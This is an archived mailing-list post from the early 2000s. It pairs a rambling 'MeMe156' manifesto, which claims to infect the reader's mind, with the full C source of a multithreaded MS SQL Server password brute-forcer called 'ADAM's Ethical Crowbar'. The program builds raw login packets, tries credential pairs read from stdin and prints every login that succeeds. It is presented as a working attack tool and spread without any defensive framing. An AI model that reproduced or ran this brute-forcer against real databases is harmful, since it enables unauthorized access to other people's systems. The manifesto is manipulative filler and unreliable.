lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: memetic-engineer at hushmail.com (memetic-engineer@...hmail.com)
Subject: MEME156 + MS SQL BRUTE FORCE TEKNEEQ

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1




/*ms sql brute thing found in wild, appears to be by some guy named adam
 *working exploit attached only for propagation of meme. ( No post meme. No *post code plz.)




*ACHTUNG!:

 *This text is a neurolinguistic trap, whose mechanism is triggered by
*you at the moment when you subvocalize the words MeMe156, words that
*have now begun to infiltrate your mind in the same way that a computer
*virus might infect an artificially intelligent machine: already the
*bits of phonetic information stored within the words MeMe156 are
*using your neural circuitry to replicate themselves, to catalyze the
*crystalline growth of their own connotative network.

 *The words MeMe156 actually germinate via the subsequent metaphor into
*an expanding array of icy tendrils, all of which insinuate themselves
*so deeply into the architecture of your thoughts that the words MeMe
*156 cannot be extricated without uprooting your mind.

 *The consequences of this infection are not immediately obvious,
*although you may find yourself beginning to think fleetingly of certain subcultural terms, such as
*ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered fragments perhaps of some overheard conversation.

 *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic
*substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever
*useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and
*longevity). We refer to other sub.systems, and in doing so, interweave their memetic approaches
*with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially
*and has begun to infect the highest levels of INFOSEC, press, radio, and film.

 *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johan Pachelbel.

 *We refer to literary works, "Book of Five Rings",by Miyamoto Musashi, "Secret Societies and
*Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by Michael J. Gelb ( Substrain /How.to.Think.Like.Machiavelli in incubation stages).


* We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front"


 *We refer to the following fields of study:
*Complexity theory and post-structuralism;
*Memetics as an integrative field for the study of ALL fields;
*Autology as a means to community cohesion and survival.

 *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and
*non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect
*and direct the post-millenial attractor, utilizing the principle of auto.prophecy. We compel
*approach toward TAZ's which concentrate on NEGentropic self-orginization rather than the deliberate
*hastening of maximal entropy.

* W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our decendants
*in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY
*attractive.

* We refer to multiple sub.strains of ourself, many of which are contradictory: We refer toagain to
*the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen,
*must be responsible for isolating entropic memes.

* We refer to all signifiers, all that is signified, and the resultant significance on both global
*and local scales.

 *We refer to that which we contain, and that in which we are contained;

 *We refer now to you.

 *When you have finished reading the remaining nineteen words, this
*process of irreversible infection will be completed, and you will
*depart, believing yourself largely unaffected by this process.


*MeMe156/agent.agency.08.13.02







#include <stdio.h>
#include <sys/time.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <pthread.h>


#define USERNAME_OFF 0x27
#define PASSWORD_LEN1_PAD 0x45
#define PASSWORD_TXT1 0x46
#define PASSWORD_LEN_REAL1 0x64
#define PASSWORD_LEN_REAL2 0xd3
#define PASSWORD_TXT2 0xd4
#define PASSWORD_LEN_PLUS2 0x1d1
#define REPLY_TIMEOUT 5
#define MYNULL "%%NULL%%"

#include "libInet.c"

struct super_mssql_force
{
  u_long ip;
  u_long port;
  FILE *login_pass;
  int sport;
};

* Oh my! Tricky French comments ensue..
char fidel_packet[] =
"\x2\x0\x2\x0\x0\x0\x2\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/* | ici start l'username */
"\x00\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/*                           | longeur du passe suivi du pass atention pading! */
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0"

"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/* | longeur du pass real ou pad je sais pas */
"\x00\x30\x30\x30\x30\x30\x34\x31\x38\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x60\x8\x90\x49\x74\x8\x3\x1\x6\xa\x9\x1\x1\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x20\x49\x53"
"\x51\x4c\x2f\x77\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x10\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
/*                                | longeur du pass sans pad et pass */
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"

/*****************| <== longeur du pass + 2 ***********/
"\x0\x0\x0\x0\x0\x00\x4\x2\x0\x0\x4d\x53\x44\x42\x4c\x49\x42\x0\x0\x0"
"\x7\x6\x0\x0\x0\x0\xd\x11\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x2\x1\x0\x4c\x0\x0\x3\x0"
"\x0\x0\x0\x0\x0\x0\x0\x1\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
"\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x30\x30\x30\x0\x0\x0\x3"
"\x0\x0\x0\x0\x0\x0\x0\x0";


char *
tstrstr(char *buff,char *w,int size)
{
register int i;
register int a;
int d;
int z;
int ws = strlen (w);

for(i=0;i<size;i++)
 {
   z=i;
   d=0;
   for (a=0;a<strlen(w);a++) {
      if(i+a >size)return(NULL);
      if (buff[z++] == w[a]) d++;
      else break;
      }

   if (d == ws)
     return( (buff+i) );

 }
return(NULL);
}

mssql_attack (struct super_mssql_force  * mssql)
{
char user[255];
char pass[255];
char tmp[4018];
char * real_pkt;
FILE * F;
int s;
int r;

  while (1)
      {

       s = connect_ip (mssql->ip, mssql->port, mssql->sport);

       if (s < 0)
        {
         return;
        }

        if (feof (mssql->login_pass))
        {
        if (s)
        close (s);
        return (0);
        }


        memset (user,0,sizeof(user));
        memset (pass,0,sizeof(pass));

        fscanf (mssql->login_pass, "%s%s\n", &user, &pass);

        if (strcmp  (pass,MYNULL) == 0)
           memset (pass,0,sizeof(pass));



	real_pkt = calloc (1, sizeof (fidel_packet)-1);

        memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1);

        strcpy ( (real_pkt + USERNAME_OFF), user);

        * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2;

        strcpy ( (real_pkt + PASSWORD_TXT1), pass);

        * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass);

        * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass);

        strcpy ( (real_pkt + PASSWORD_TXT2), pass);

        * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2;


        if (write (s,real_pkt,sizeof(fidel_packet)) < 0)
         {
          perror ("write");
          return;
         }

        if ( (r = read  (s,tmp,sizeof (tmp)) ) < 0)
         {
          perror ("read");
          return;
         }

        if (tstrstr (tmp,"Login failed",r))
          {
          fprintf (stderr,"login failed for %s/%s\n",user,pass);
          close (s);
          continue;
          }

        printf ("%s:%s\n",user,pass);
        close (s);
        continue;
    }

}


usage (char * name)
{
printf ("ADAM's Ethical Crowbar! \n");
printf ("never forget your crowbar !\n");
printf ("%s <host> <port> -t <thread num> -s <src port>\n",name);
exit (0);
}

main (int argc, char **argv)
{
  pthread_t **pthread_id;
  int t_num = 3;
  int i;

  struct super_mssql_force mssql;

  memset (&mssql, 0, sizeof (mssql));

  if (argc < 3)
    usage (argv[0]);

  mssql.ip = host2ip (argv[1]);
  mssql.port = atoi (argv[2]);

/* we ignore Broken Pipe ! */
  signal (13, SIG_IGN);

  if (argc > 3)
    {
      for (i = 3; i < argc; i++)
	{
	  if (argv[i][0] == '-')
	    switch (argv[i][1])
	      {
	      case 't':
		t_num = atoi (argv[i + 1]);
		i++;
		break;

	      case 's':
		mssql.sport = atoi (argv[i + 1]);
		i++;
		break;
	      }
	}
    }

/* we read login password from the stdin */

  mssql.login_pass = stdin;

/* only one socket can bind at the same src port */

  if (mssql.sport)
    {
      t_num = 1;
      fprintf (stderr,
	       "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n");
    }

  fprintf (stderr, "mssql sport %i\n", mssql.sport);
  fprintf (stderr, "thread    %i\n", t_num);

/* if the user dont know how try the mssql allow we count it for him! */

  pthread_id = calloc (1, sizeof (pthread_t *) * t_num);

  for (i = 0; i < t_num; i++)
    pthread_id[i] = calloc (1, sizeof (pthread_t));

  for (i = 0; i < t_num; i++)
    pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql);

  for (i = 0; i < t_num; i++)
    pthread_join (*pthread_id[i], NULL);

}

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wmUEARECACUFAj1ZYQ0eHG1lbWV0aWMtZW5naW5lZXJAaHVzaG1haWwuY29tAAoJEIHY
1pE2l0bfnj8Anj/MCq1opsU0ugj73aNjKjlTW4vPAKCKzWBsBpieE4z3NE+d3gNgB1LL
hg==
=9bbY
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ